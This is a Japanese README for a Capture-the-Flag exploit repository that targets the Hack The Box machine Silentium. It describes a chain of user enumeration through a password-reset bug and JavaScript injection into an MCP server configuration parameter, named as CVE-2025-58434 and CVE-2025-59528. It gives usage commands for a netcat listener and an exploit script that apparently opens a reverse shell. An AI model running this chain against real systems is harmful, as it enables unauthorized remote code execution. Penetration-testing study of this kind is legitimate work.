
エクスプロイテーション Silentium HTB-CTF
このリポジトリには、Hack The BoxのSilentiumマシンに対する完全なエクスプロイトチェーンが含まれています。このエクスプロイトは、ユーザー列挙とJavaScriptインジェクションを含む2段階の脆弱性を利用して、リモートコード実行 (RCE) を達成します。
脆弱性チェーンは、情報漏洩の脆弱性と重大なコードインジェクションから構成されています。まず、パスワードリセットのバグを利用して有効なユーザーを列挙することで、customMCPエンドポイントをターゲットにするために必要なコンテキストを得ます。RCEは、悪意のあるJavaScript関数をmcpServerConfigパラメータに注入することで達成され、Node.jsバックエンドによって実行されます。
Python 3とBashがインストールされている必要があります。また、以下のライブラリが必要です:
pip install requests
列挙スクリプト(Bash)を実行して有効なアカウントを見つけます(users.txtが必要です):
python3 CVE-2025-58434.py
ローカルマシンでNetcatリスナーを起動します:
nc -lvnp 4444
ターゲット、自分のIP、取得したAPIキーを指定してPythonスクリプトを実行します:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
このスクリプトは教育目的およびCTF環境内での許可されたペネトレーションテストのみを目的としています。事前の許可なしにターゲットにアクセスまたは攻撃することは違法です。
チャレンジ: Silentium (Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528
| 引数 | 説明 | 必須 |
|---|
| -t, --target | ターゲットホスト | はい |
| -k, --key | API Bearer Token | はい |
| -l, --lhost | リスナーのIP(VPN) | はい |
| -p, --lport | リスナーのポート | はい |